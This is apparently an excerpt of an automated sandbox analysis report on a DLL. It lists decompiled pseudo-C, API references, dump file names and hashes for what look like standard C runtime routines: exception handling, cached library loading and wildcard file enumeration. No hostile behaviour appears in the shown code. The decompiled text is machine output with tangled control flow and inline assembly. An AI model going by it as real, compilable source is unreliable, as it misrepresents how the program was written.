                                                                                        0x10004334
                                                                                        0x10004338
                                                                                        0x00000000
                                                                                        0x10004338
                                                                                        0x10004341

                                                                                        APIs
                                                                                        • ___BuildCatchObject.LIBVCRUNTIME ref: 100042DC
                                                                                          • Part of subcall function 10004229: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 10004258
                                                                                          • Part of subcall function 10004229: ___AdjustPointer.LIBCMT ref: 10004273
                                                                                        • _UnwindNestedFrames.LIBCMT ref: 100042F1
                                                                                        • __FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 10004302
                                                                                        • CallCatchBlock.LIBVCRUNTIME ref: 1000432A
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000003.661084660.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                        • Associated: 00000000.00000003.373928207.000000001001D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000003.661074193.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000003.661103501.0000000010013000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000003.661115201.000000001001A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000003.661124775.000000001001C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_3_10000000______NCM______2_10042231.jbxd
                                                                                        Similarity
                                                                                        • API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
                                                                                        • String ID:
                                                                                        • API String ID: 737400349-0
                                                                                        • Opcode ID: fff7966060ecdfe608d95c6e6085de5a2865024f93ecd5ba7a47608296c450eb
                                                                                        • Instruction ID: 6f45e61180c0b5229c7d32c43e3b7bd649065aa9074ebb89eabc90e9221d8f97
                                                                                        • Opcode Fuzzy Hash: fff7966060ecdfe608d95c6e6085de5a2865024f93ecd5ba7a47608296c450eb
                                                                                        • Instruction Fuzzy Hash: AA014CB6200149BBEF129E96CC41EEB7B6DEF48795F014018FE0856125CB72E861DBA4
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 95%
                                                                                        			E1000AB18(signed int _a4) {
                                                                                        				signed int _t9;
                                                                                        				void* _t13;
                                                                                        				signed int _t15;
                                                                                        				WCHAR* _t22;
                                                                                        				signed int _t24;
                                                                                        				signed int* _t25;
                                                                                        				void* _t27;
                                                                                        
                                                                                        				_t9 = _a4;
                                                                                        				_t25 = 0x1001b108 + _t9 * 4;
                                                                                        				_t24 =  *_t25;
                                                                                        				if(_t24 == 0) {
                                                                                        					_t22 =  *(0x10014390 + _t9 * 4);
                                                                                        					_t27 = LoadLibraryExW(_t22, 0, 0x800);
                                                                                        					if(_t27 != 0) {
                                                                                        						L8:
                                                                                        						 *_t25 = _t27;
                                                                                        						if( *_t25 != 0) {
                                                                                        							FreeLibrary(_t27);
                                                                                        						}
                                                                                        						_t13 = _t27;
                                                                                        						L11:
                                                                                        						return _t13;
                                                                                        					}
                                                                                        					_t15 = GetLastError();
                                                                                        					if(_t15 != 0x57) {
                                                                                        						_t27 = 0;
                                                                                        					} else {
                                                                                        						_t15 = LoadLibraryExW(_t22, _t27, _t27);
                                                                                        						_t27 = _t15;
                                                                                        					}
                                                                                        					if(_t27 != 0) {
                                                                                        						goto L8;
                                                                                        					} else {
                                                                                        						 *_t25 = _t15 | 0xffffffff;
                                                                                        						_t13 = 0;
                                                                                        						goto L11;
                                                                                        					}
                                                                                        				}
                                                                                        				_t4 = _t24 + 1; // 0xcfb68a76
                                                                                        				asm("sbb eax, eax");
                                                                                        				return  ~_t4 & _t24;
                                                                                        			}










                                                                                        0x1000ab1d
                                                                                        0x1000ab21
                                                                                        0x1000ab28
                                                                                        0x1000ab2c
                                                                                        0x1000ab3a
                                                                                        0x1000ab50
                                                                                        0x1000ab54
                                                                                        0x1000ab7d
                                                                                        0x1000ab7f
                                                                                        0x1000ab83
                                                                                        0x1000ab86
                                                                                        0x1000ab86
                                                                                        0x1000ab8c
                                                                                        0x1000ab8e
                                                                                        0x00000000
                                                                                        0x1000ab8f
                                                                                        0x1000ab56
                                                                                        0x1000ab5f
                                                                                        0x1000ab6e
                                                                                        0x1000ab61
                                                                                        0x1000ab64
                                                                                        0x1000ab6a
                                                                                        0x1000ab6a
                                                                                        0x1000ab72
                                                                                        0x00000000
                                                                                        0x1000ab74
                                                                                        0x1000ab77
                                                                                        0x1000ab79
                                                                                        0x00000000
                                                                                        0x1000ab79
                                                                                        0x1000ab72
                                                                                        0x1000ab2e
                                                                                        0x1000ab33
                                                                                        0x00000000

                                                                                        APIs
                                                                                        • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00000000,00000000,?,1000AABF,?,00000000,00000000,00000000,?,1000ACBC,00000006,FlsSetValue), ref: 1000AB4A
                                                                                        • GetLastError.KERNEL32(?,1000AABF,?,00000000,00000000,00000000,?,1000ACBC,00000006,FlsSetValue,10014910,FlsSetValue,00000000,00000364,?,100094F2), ref: 1000AB56
                                                                                        • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,1000AABF,?,00000000,00000000,00000000,?,1000ACBC,00000006,FlsSetValue,10014910,FlsSetValue,00000000), ref: 1000AB64
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000003.661084660.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                        • Associated: 00000000.00000003.373928207.000000001001D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000003.661074193.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000003.661103501.0000000010013000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000003.661115201.000000001001A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000003.661124775.000000001001C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_3_10000000______NCM______2_10042231.jbxd
                                                                                        Similarity
                                                                                        • API ID: LibraryLoad$ErrorLast
                                                                                        • String ID:
                                                                                        • API String ID: 3177248105-0
                                                                                        • Opcode ID: a66fbec666259430b1761894b7e2fb66ceb1175ce01d45e3299777f0d80853f5
                                                                                        • Instruction ID: c1050e3f268e07daf94fbc747f178b21691f6a297127b0de9aa43d961367ca7a
                                                                                        • Opcode Fuzzy Hash: a66fbec666259430b1761894b7e2fb66ceb1175ce01d45e3299777f0d80853f5
                                                                                        • Instruction Fuzzy Hash: 6201FC326453365BE721CA788C94E4B77DAEF467E07124320F919D3146DB30D840C7E0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 72%
                                                                                        			E1000AF8C(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8, intOrPtr _a12) {
                                                                                        				intOrPtr _v0;
                                                                                        				char _v6;
                                                                                        				char _v8;
                                                                                        				signed int _v12;
                                                                                        				signed int _v16;
                                                                                        				signed int _v20;
                                                                                        				signed int _v24;
                                                                                        				signed int _v28;
                                                                                        				signed int _v36;
                                                                                        				intOrPtr* _v64;
                                                                                        				intOrPtr _v96;
                                                                                        				intOrPtr* _v100;
                                                                                        				CHAR* _v104;
                                                                                        				signed int _v116;
                                                                                        				char _v290;
                                                                                        				signed int _v291;
                                                                                        				struct _WIN32_FIND_DATAA _v336;
                                                                                        				union _FINDEX_INFO_LEVELS _v340;
                                                                                        				signed int _v344;
                                                                                        				signed int _v348;
                                                                                        				intOrPtr _v440;
                                                                                        				intOrPtr* _t80;
                                                                                        				signed int _t82;
                                                                                        				signed int _t87;
                                                                                        				signed int _t91;
                                                                                        				signed int _t93;
                                                                                        				signed int _t95;
                                                                                        				signed int _t96;
                                                                                        				signed int _t100;
                                                                                        				signed int _t103;
                                                                                        				signed int _t108;
                                                                                        				signed int _t111;
                                                                                        				intOrPtr _t113;
                                                                                        				signed char _t115;
                                                                                        				union _FINDEX_INFO_LEVELS _t123;
                                                                                        				signed int _t128;
                                                                                        				signed int _t131;
                                                                                        				void* _t137;
                                                                                        				void* _t139;
                                                                                        				signed int _t140;
                                                                                        				signed int _t143;
                                                                                        				signed int _t145;
                                                                                        				signed int _t147;
                                                                                        				signed int* _t148;
                                                                                        				signed int _t151;
                                                                                        				void* _t154;
                                                                                        				CHAR* _t155;
                                                                                        				char _t158;
                                                                                        				char _t160;
                                                                                        				intOrPtr* _t163;
                                                                                        				void* _t164;
                                                                                        				intOrPtr* _t165;
                                                                                        				signed int _t167;
                                                                                        				void* _t169;
                                                                                        				intOrPtr* _t170;
                                                                                        				signed int _t174;
                                                                                        				signed int _t178;
                                                                                        				signed int _t179;
                                                                                        				intOrPtr* _t184;
                                                                                        				void* _t193;
                                                                                        				intOrPtr _t194;
                                                                                        				signed int _t196;
                                                                                        				signed int _t197;
                                                                                        				signed int _t199;
                                                                                        				signed int _t200;
                                                                                        				signed int _t202;
                                                                                        				union _FINDEX_INFO_LEVELS _t203;
                                                                                        				signed int _t208;
                                                                                        				signed int _t210;
                                                                                        				signed int _t211;
                                                                                        				void* _t213;
                                                                                        				intOrPtr _t214;
                                                                                        				void* _t215;
                                                                                        				signed int _t219;
                                                                                        				void* _t221;
                                                                                        				signed int _t222;
                                                                                        				void* _t223;
                                                                                        				void* _t224;
                                                                                        				void* _t225;
                                                                                        				signed int _t226;
                                                                                        				void* _t227;
                                                                                        				void* _t228;
                                                                                        
                                                                                        				_t80 = _a8;
                                                                                        				_t224 = _t223 - 0x20;
                                                                                        				if(_t80 != 0) {
                                                                                        					_t208 = _a4;
                                                                                        					_t160 = 0;
                                                                                        					 *_t80 = 0;
                                                                                        					_t199 = 0;
                                                                                        					_t151 = 0;
                                                                                        					_v36 = 0;
                                                                                        					_v336.cAlternateFileName = 0;
                                                                                        					_v28 = 0;
                                                                                        					__eflags =  *_t208;
                                                                                        					if( *_t208 == 0) {
                                                                                        						L9:
                                                                                        						_v12 = _v12 & 0x00000000;
                                                                                        						_t82 = _t151 - _t199;
                                                                                        						_v8 = _t160;
                                                                                        						_t191 = (_t82 >> 2) + 1;
                                                                                        						__eflags = _t151 - _t199;
                                                                                        						_v16 = (_t82 >> 2) + 1;
                                                                                        						asm("sbb esi, esi");
                                                                                        						_t210 =  !_t208 & _t82 + 0x00000003 >> 0x00000002;
                                                                                        						__eflags = _t210;
                                                                                        						if(_t210 != 0) {
                                                                                        							_t197 = _t199;
                                                                                        							_t158 = _t160;
                                                                                        							do {
                                                                                        								_t184 =  *_t197;
                                                                                        								_t17 = _t184 + 1; // 0x1
                                                                                        								_v8 = _t17;
                                                                                        								do {
                                                                                        									_t143 =  *_t184;
                                                                                        									_t184 = _t184 + 1;
                                                                                        									__eflags = _t143;
                                                                                        								} while (_t143 != 0);
                                                                                        								_t158 = _t158 + 1 + _t184 - _v8;
                                                                                        								_t197 = _t197 + 4;
                                                                                        								_t145 = _v12 + 1;
                                                                                        								_v12 = _t145;
                                                                                        								__eflags = _t145 - _t210;
                                                                                        							} while (_t145 != _t210);
                                                                                        							_t191 = _v16;
                                                                                        							_v8 = _t158;
                                                                                        							_t151 = _v336.cAlternateFileName;
                                                                                        						}
                                                                                        						_t211 = E100081A9(_t191, _v8, 1);
                                                                                        						_t225 = _t224 + 0xc;
                                                                                        						__eflags = _t211;
                                                                                        						if(_t211 != 0) {
                                                                                        							_t87 = _t211 + _v16 * 4;
                                                                                        							_v20 = _t87;
                                                                                        							_t192 = _t87;
                                                                                        							_v16 = _t87;
                                                                                        							__eflags = _t199 - _t151;
                                                                                        							if(_t199 == _t151) {
                                                                                        								L23:
                                                                                        								_t200 = 0;
                                                                                        								__eflags = 0;
                                                                                        								 *_a8 = _t211;
                                                                                        								goto L24;
                                                                                        							} else {
                                                                                        								_t93 = _t211 - _t199;
                                                                                        								__eflags = _t93;
                                                                                        								_v24 = _t93;
                                                                                        								do {
                                                                                        									_t163 =  *_t199;
                                                                                        									_v12 = _t163 + 1;
                                                                                        									do {
                                                                                        										_t95 =  *_t163;
                                                                                        										_t163 = _t163 + 1;
                                                                                        										__eflags = _t95;
                                                                                        									} while (_t95 != 0);
                                                                                        									_t164 = _t163 - _v12;
                                                                                        									_t35 = _t164 + 1; // 0x1
                                                                                        									_t96 = _t35;
                                                                                        									_push(_t96);
                                                                                        									_v12 = _t96;
                                                                                        									_t100 = E1000F27B(_t164, _t192, _v20 - _t192 + _v8,  *_t199);
                                                                                        									_t225 = _t225 + 0x10;
                                                                                        									__eflags = _t100;
                                                                                        									if(_t100 != 0) {
                                                                                        										_push(0);
                                                                                        										_push(0);
                                                                                        										_push(0);
                                                                                        										_push(0);
                                                                                        										_push(0);
                                                                                        										E100061FC();
                                                                                        										asm("int3");
                                                                                        										_t221 = _t225;
                                                                                        										_push(_t164);
                                                                                        										_t165 = _v64;
                                                                                        										_t47 = _t165 + 1; // 0x1
                                                                                        										_t193 = _t47;
                                                                                        										do {
                                                                                        											_t103 =  *_t165;
                                                                                        											_t165 = _t165 + 1;
                                                                                        											__eflags = _t103;
                                                                                        										} while (_t103 != 0);
                                                                                        										_push(_t199);
                                                                                        										_t202 = _a8;
                                                                                        										_t167 = _t165 - _t193 + 1;
                                                                                        										_v12 = _t167;
                                                                                        										__eflags = _t167 - (_t103 | 0xffffffff) - _t202;
                                                                                        										if(_t167 <= (_t103 | 0xffffffff) - _t202) {
                                                                                        											_push(_t151);
                                                                                        											_t50 = _t202 + 1; // 0x1
                                                                                        											_t154 = _t50 + _t167;
                                                                                        											_t213 = E1000AF17(_t167, _t154, 1);
                                                                                        											_t169 = _t211;
                                                                                        											__eflags = _t202;
                                                                                        											if(_t202 == 0) {
                                                                                        												L34:
                                                                                        												_push(_v12);
                                                                                        												_t154 = _t154 - _t202;
                                                                                        												_t108 = E1000F27B(_t169, _t213 + _t202, _t154, _v0);
                                                                                        												_t226 = _t225 + 0x10;
                                                                                        												__eflags = _t108;
                                                                                        												if(__eflags != 0) {
                                                                                        													goto L37;
                                                                                        												} else {
                                                                                        													_t137 = E1000B35B(_a12, __eflags, _t213);
                                                                                        													E10009811(0);
                                                                                        													_t139 = _t137;
                                                                                        													goto L36;
                                                                                        												}
                                                                                        											} else {
                                                                                        												_push(_t202);
                                                                                        												_t140 = E1000F27B(_t169, _t213, _t154, _a4);
                                                                                        												_t226 = _t225 + 0x10;
                                                                                        												__eflags = _t140;
                                                                                        												if(_t140 != 0) {
                                                                                        													L37:
                                                                                        													_push(0);
                                                                                        													_push(0);
                                                                                        													_push(0);
                                                                                        													_push(0);
                                                                                        													_push(0);
                                                                                        													E100061FC();
                                                                                        													asm("int3");
                                                                                        													_push(_t221);
                                                                                        													_t222 = _t226;
                                                                                        													_t227 = _t226 - 0x150;
                                                                                        													_t111 =  *0x1001a004; // 0xcfb68a75
                                                                                        													_v116 = _t111 ^ _t222;
                                                                                        													_t170 = _v100;
                                                                                        													_push(_t154);
                                                                                        													_t155 = _v104;
                                                                                        													_push(_t213);
                                                                                        													_t214 = _v96;
                                                                                        													_push(_t202);
                                                                                        													_v440 = _t214;
                                                                                        													while(1) {
                                                                                        														__eflags = _t170 - _t155;
                                                                                        														if(_t170 == _t155) {
                                                                                        															break;
                                                                                        														}
                                                                                        														_t113 =  *_t170;
                                                                                        														__eflags = _t113 - 0x2f;
                                                                                        														if(_t113 != 0x2f) {
                                                                                        															__eflags = _t113 - 0x5c;
                                                                                        															if(_t113 != 0x5c) {
                                                                                        																__eflags = _t113 - 0x3a;
                                                                                        																if(_t113 != 0x3a) {
                                                                                        																	_t170 = E1000F2D0(_t155, _t170);
                                                                                        																	continue;
                                                                                        																}
                                                                                        															}
                                                                                        														}
                                                                                        														break;
                                                                                        													}
                                                                                        													_t194 =  *_t170;
                                                                                        													__eflags = _t194 - 0x3a;
                                                                                        													if(_t194 != 0x3a) {
                                                                                        														L47:
                                                                                        														_t203 = 0;
                                                                                        														__eflags = _t194 - 0x2f;
                                                                                        														if(_t194 == 0x2f) {
                                                                                        															L51:
                                                                                        															_t115 = 1;
                                                                                        															__eflags = 1;
                                                                                        														} else {
                                                                                        															__eflags = _t194 - 0x5c;
                                                                                        															if(_t194 == 0x5c) {
                                                                                        																goto L51;
                                                                                        															} else {
                                                                                        																__eflags = _t194 - 0x3a;
                                                                                        																if(_t194 == 0x3a) {
                                                                                        																	goto L51;
                                                                                        																} else {
                                                                                        																	_t115 = 0;
                                                                                        																}
                                                                                        															}
                                                                                        														}
                                                                                        														asm("sbb eax, eax");
                                                                                        														_v344 =  ~(_t115 & 0x000000ff) & _t170 - _t155 + 0x00000001;
                                                                                        														E10003E50(_t203,  &_v336, _t203, 0x140);
                                                                                        														_t228 = _t227 + 0xc;
                                                                                        														_t215 = FindFirstFileExA(_t155, _t203,  &_v336, _t203, _t203, _t203);
                                                                                        														_t123 = _v340;
                                                                                        														__eflags = _t215 - 0xffffffff;
                                                                                        														if(_t215 != 0xffffffff) {
                                                                                        															_t174 =  *((intOrPtr*)(_t123 + 4)) -  *_t123;
                                                                                        															__eflags = _t174;
                                                                                        															_v348 = _t174 >> 2;
                                                                                        															do {
                                                                                        																__eflags = _v336.cFileName - 0x2e;
                                                                                        																if(_v336.cFileName != 0x2e) {
                                                                                        																	L64:
                                                                                        																	_push(_t123);
                                                                                        																	_push(_v344);
                                                                                        																	_t123 =  &(_v336.cFileName);
                                                                                        																	_push(_t155);
                                                                                        																	_push(_t123);
                                                                                        																	L28();
                                                                                        																	_t228 = _t228 + 0x10;
                                                                                        																	__eflags = _t123;
                                                                                        																	if(_t123 != 0) {
                                                                                        																		goto L54;
                                                                                        																	} else {
                                                                                        																		goto L65;
                                                                                        																	}
                                                                                        																} else {
                                                                                        																	_t178 = _v291;
                                                                                        																	__eflags = _t178;
                                                                                        																	if(_t178 == 0) {
                                                                                        																		goto L65;
                                                                                        																	} else {
                                                                                        																		__eflags = _t178 - 0x2e;
                                                                                        																		if(_t178 != 0x2e) {
                                                                                        																			goto L64;
                                                                                        																		} else {
                                                                                        																			__eflags = _v290;
                                                                                        																			if(_v290 == 0) {
                                                                                        																				goto L65;
                                                                                        																			} else {
                                                                                        																				goto L64;
                                                                                        																			}
                                                                                        																		}
                                                                                        																	}
                                                                                        																}
                                                                                        																goto L58;
                                                                                        																L65:
                                                                                        																_t128 = FindNextFileA(_t215,  &_v336);
                                                                                        																__eflags = _t128;
                                                                                        																_t123 = _v340;
                                                                                        															} while (_t128 != 0);
                                                                                        															_t195 =  *_t123;
                                                                                        															_t179 = _v348;
                                                                                        															_t131 =  *((intOrPtr*)(_t123 + 4)) -  *_t123 >> 2;
                                                                                        															__eflags = _t179 - _t131;
                                                                                        															if(_t179 != _t131) {
                                                                                        																E1000EE30(_t155, _t203, _t215, _t195 + _t179 * 4, _t131 - _t179, 4, E1000AF74);
                                                                                        															}
                                                                                        														} else {
                                                                                        															_push(_t123);
                                                                                        															_push(_t203);
                                                                                        															_push(_t203);
                                                                                        															_push(_t155);
                                                                                        															L28();
                                                                                        															L54:
                                                                                        															_t203 = _t123;
                                                                                        														}
                                                                                        														__eflags = _t215 - 0xffffffff;
                                                                                        														if(_t215 != 0xffffffff) {
                                                                                        															FindClose(_t215);
                                                                                        														}
                                                                                        													} else {
                                                                                        														__eflags = _t170 -  &(_t155[1]);
                                                                                        														if(_t170 ==  &(_t155[1])) {
                                                                                        															goto L47;
                                                                                        														} else {
                                                                                        															_push(_t214);
                                                                                        															_push(0);
                                                                                        															_push(0);
                                                                                        															_push(_t155);
                                                                                        															L28();
                                                                                        														}
                                                                                        													}
                                                                                        													L58:
                                                                                        													__eflags = _v16 ^ _t222;
                                                                                        													return E1000296F(_v16 ^ _t222);
                                                                                        												} else {
                                                                                        													goto L34;
                                                                                        												}
                                                                                        											}
                                                                                        										} else {
                                                                                        											_t139 = 0xc;
                                                                                        											L36:
                                                                                        											return _t139;
                                                                                        										}
                                                                                        									} else {
                                                                                        										goto L22;
                                                                                        									}
                                                                                        									goto L68;
                                                                                        									L22:
                                                                                        									_t196 = _v16;
                                                                                        									 *((intOrPtr*)(_v24 + _t199)) = _t196;
                                                                                        									_t199 = _t199 + 4;
                                                                                        									_t192 = _t196 + _v12;
                                                                                        									_v16 = _t196 + _v12;
                                                                                        									__eflags = _t199 - _t151;
                                                                                        								} while (_t199 != _t151);
                                                                                        								goto L23;
                                                                                        							}
                                                                                        						} else {
                                                                                        							_t200 = _t199 | 0xffffffff;
                                                                                        							L24:
                                                                                        							E10009811(0);
                                                                                        							goto L25;
                                                                                        						}
                                                                                        					} else {
                                                                                        						while(1) {
                                                                                        							_v8 = 0x3f2a;
                                                                                        							_v6 = _t160;
                                                                                        							_t147 = E1000F290( *_t208,  &_v8);
                                                                                        							__eflags = _t147;
                                                                                        							if(_t147 != 0) {
                                                                                        								_push( &_v36);
                                                                                        								_push(_t147);
                                                                                        								_push( *_t208);
                                                                                        								L38();
                                                                                        								_t224 = _t224 + 0xc;
                                                                                        							} else {
                                                                                        								_t147 =  &_v36;
                                                                                        								_push(_t147);
                                                                                        								_push(0);
                                                                                        								_push(0);
                                                                                        								_push( *_t208);
                                                                                        								L28();
                                                                                        								_t224 = _t224 + 0x10;
                                                                                        							}
                                                                                        							_t200 = _t147;
                                                                                        							__eflags = _t200;
                                                                                        							if(_t200 != 0) {
                                                                                        								break;
                                                                                        							}
                                                                                        							_t208 = _t208 + 4;
                                                                                        							_t160 = 0;
                                                                                        							__eflags =  *_t208;
                                                                                        							if( *_t208 != 0) {
                                                                                        								continue;
                                                                                        							} else {
                                                                                        								_t151 = _v336.cAlternateFileName;
                                                                                        								_t199 = _v36;
                                                                                        								goto L9;
                                                                                        							}
                                                                                        							goto L68;
                                                                                        						}
                                                                                        						L25:
                                                                                        						E1000B336( &_v36);
                                                                                        						_t91 = _t200;
                                                                                        						goto L26;
                                                                                        					}
                                                                                        				} else {
                                                                                        					_t148 = E100097FE();
                                                                                        					_t219 = 0x16;
                                                                                        					 *_t148 = _t219;
                                                                                        					E100061CF();
                                                                                        					_t91 = _t219;
                                                                                        					L26:
                                                                                        					return _t91;
                                                                                        				}
                                                                                        				L68:
                                                                                        			}





















































































                                                                                        0x1000af91
                                                                                        0x1000af94
                                                                                        0x1000af9a
                                                                                        0x1000afb2
                                                                                        0x1000afb5
                                                                                        0x1000afb9
                                                                                        0x1000afbb
                                                                                        0x1000afbd
                                                                                        0x1000afbf
                                                                                        0x1000afc2
                                                                                        0x1000afc5
                                                                                        0x1000afc8
                                                                                        0x1000afca
                                                                                        0x1000b022
                                                                                        0x1000b022
                                                                                        0x1000b028
                                                                                        0x1000b02a
                                                                                        0x1000b035
                                                                                        0x1000b039
                                                                                        0x1000b03b
                                                                                        0x1000b03e
                                                                                        0x1000b042
                                                                                        0x1000b042
                                                                                        0x1000b044
                                                                                        0x1000b046
                                                                                        0x1000b048
                                                                                        0x1000b04a
                                                                                        0x1000b04a
                                                                                        0x1000b04c
                                                                                        0x1000b04f
                                                                                        0x1000b052
                                                                                        0x1000b052
                                                                                        0x1000b054
                                                                                        0x1000b055
                                                                                        0x1000b055
                                                                                        0x1000b060
                                                                                        0x1000b062
                                                                                        0x1000b065
                                                                                        0x1000b066
                                                                                        0x1000b069
                                                                                        0x1000b069
                                                                                        0x1000b06d
                                                                                        0x1000b070
                                                                                        0x1000b073
                                                                                        0x1000b073
                                                                                        0x1000b081
                                                                                        0x1000b083
                                                                                        0x1000b086
                                                                                        0x1000b088
                                                                                        0x1000b092
                                                                                        0x1000b095
                                                                                        0x1000b098
                                                                                        0x1000b09a
                                                                                        0x1000b09d
                                                                                        0x1000b09f
                                                                                        0x1000b0ef
                                                                                        0x1000b0f2
                                                                                        0x1000b0f2
                                                                                        0x1000b0f4
                                                                                        0x00000000
                                                                                        0x1000b0a1
                                                                                        0x1000b0a3
                                                                                        0x1000b0a3
                                                                                        0x1000b0a5
                                                                                        0x1000b0a8
                                                                                        0x1000b0a8
                                                                                        0x1000b0ad
                                                                                        0x1000b0b0
                                                                                        0x1000b0b0
                                                                                        0x1000b0b2
                                                                                        0x1000b0b3
                                                                                        0x1000b0b3
                                                                                        0x1000b0b7
                                                                                        0x1000b0ba
                                                                                        0x1000b0ba
                                                                                        0x1000b0bd
                                                                                        0x1000b0c0
                                                                                        0x1000b0cd
                                                                                        0x1000b0d2
                                                                                        0x1000b0d5
                                                                                        0x1000b0d7
                                                                                        0x1000b111
                                                                                        0x1000b112
                                                                                        0x1000b113
                                                                                        0x1000b114
                                                                                        0x1000b115
                                                                                        0x1000b116
                                                                                        0x1000b11b
                                                                                        0x1000b11f
                                                                                        0x1000b121
                                                                                        0x1000b122
                                                                                        0x1000b125
                                                                                        0x1000b125
                                                                                        0x1000b128
                                                                                        0x1000b128
                                                                                        0x1000b12a
                                                                                        0x1000b12b
                                                                                        0x1000b12b
                                                                                        0x1000b134
                                                                                        0x1000b135
                                                                                        0x1000b138
                                                                                        0x1000b13b
                                                                                        0x1000b13e
                                                                                        0x1000b140
                                                                                        0x1000b147
                                                                                        0x1000b149
                                                                                        0x1000b14c
                                                                                        0x1000b156
                                                                                        0x1000b159
                                                                                        0x1000b15a
                                                                                        0x1000b15c
                                                                                        0x1000b170
                                                                                        0x1000b170
                                                                                        0x1000b173
                                                                                        0x1000b17d
                                                                                        0x1000b182
                                                                                        0x1000b185
                                                                                        0x1000b187
                                                                                        0x00000000
                                                                                        0x1000b189
                                                                                        0x1000b18d
                                                                                        0x1000b196
                                                                                        0x1000b19c
                                                                                        0x00000000
                                                                                        0x1000b19f
                                                                                        0x1000b15e
                                                                                        0x1000b15e
                                                                                        0x1000b164
                                                                                        0x1000b169
                                                                                        0x1000b16c
                                                                                        0x1000b16e
                                                                                        0x1000b1a5
                                                                                        0x1000b1a7
                                                                                        0x1000b1a8
                                                                                        0x1000b1a9
                                                                                        0x1000b1aa
                                                                                        0x1000b1ab
                                                                                        0x1000b1ac
                                                                                        0x1000b1b1
                                                                                        0x1000b1b4
                                                                                        0x1000b1b5
                                                                                        0x1000b1b7
                                                                                        0x1000b1bd
                                                                                        0x1000b1c4
                                                                                        0x1000b1c7
                                                                                        0x1000b1ca
                                                                                        0x1000b1cb
                                                                                        0x1000b1ce
                                                                                        0x1000b1cf
                                                                                        0x1000b1d2
                                                                                        0x1000b1d3
                                                                                        0x1000b1f4
                                                                                        0x1000b1f4
                                                                                        0x1000b1f6
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x1000b1db
                                                                                        0x1000b1dd
                                                                                        0x1000b1df
                                                                                        0x1000b1e1
                                                                                        0x1000b1e3
                                                                                        0x1000b1e5
                                                                                        0x1000b1e7
                                                                                        0x1000b1f2
                                                                                        0x00000000
                                                                                        0x1000b1f2
                                                                                        0x1000b1e7
                                                                                        0x1000b1e3
                                                                                        0x00000000
                                                                                        0x1000b1df
                                                                                        0x1000b1f8
                                                                                        0x1000b1fa
                                                                                        0x1000b1fd
                                                                                        0x1000b216
                                                                                        0x1000b216
                                                                                        0x1000b218
                                                                                        0x1000b21b
                                                                                        0x1000b22b
                                                                                        0x1000b22d
                                                                                        0x1000b22d
                                                                                        0x1000b21d
                                                                                        0x1000b21d
                                                                                        0x1000b220
                                                                                        0x00000000
                                                                                        0x1000b222
                                                                                        0x1000b222
                                                                                        0x1000b225
                                                                                        0x00000000
                                                                                        0x1000b227
                                                                                        0x1000b227
                                                                                        0x1000b227
                                                                                        0x1000b225
                                                                                        0x1000b220
                                                                                        0x1000b23b
                                                                                        0x1000b23f
                                                                                        0x1000b24d
                                                                                        0x1000b252
                                                                                        0x1000b267
                                                                                        0x1000b269
                                                                                        0x1000b26f
                                                                                        0x1000b272
                                                                                        0x1000b2a4
                                                                                        0x1000b2a4
                                                                                        0x1000b2a9
                                                                                        0x1000b2af
                                                                                        0x1000b2af
                                                                                        0x1000b2b6
                                                                                        0x1000b2d0
                                                                                        0x1000b2d0
                                                                                        0x1000b2d1
                                                                                        0x1000b2d7
                                                                                        0x1000b2dd
                                                                                        0x1000b2de
                                                                                        0x1000b2df
                                                                                        0x1000b2e4
                                                                                        0x1000b2e7
                                                                                        0x1000b2e9
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x1000b2b8
                                                                                        0x1000b2b8
                                                                                        0x1000b2be
                                                                                        0x1000b2c0
                                                                                        0x00000000
                                                                                        0x1000b2c2
                                                                                        0x1000b2c2
                                                                                        0x1000b2c5
                                                                                        0x00000000
                                                                                        0x1000b2c7
                                                                                        0x1000b2c7
                                                                                        0x1000b2ce
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x1000b2ce
                                                                                        0x1000b2c5
                                                                                        0x1000b2c0
                                                                                        0x00000000
                                                                                        0x1000b2eb
                                                                                        0x1000b2f3
                                                                                        0x1000b2f9
                                                                                        0x1000b2fb
                                                                                        0x1000b2fb
                                                                                        0x1000b303
                                                                                        0x1000b308
                                                                                        0x1000b310
                                                                                        0x1000b313
                                                                                        0x1000b315
                                                                                        0x1000b329
                                                                                        0x1000b32e
                                                                                        0x1000b274
                                                                                        0x1000b274
                                                                                        0x1000b275
                                                                                        0x1000b276
                                                                                        0x1000b277
                                                                                        0x1000b278
                                                                                        0x1000b280
                                                                                        0x1000b280
                                                                                        0x1000b280
                                                                                        0x1000b282
                                                                                        0x1000b285
                                                                                        0x1000b288
                                                                                        0x1000b288
                                                                                        0x1000b1ff
                                                                                        0x1000b202
                                                                                        0x1000b204
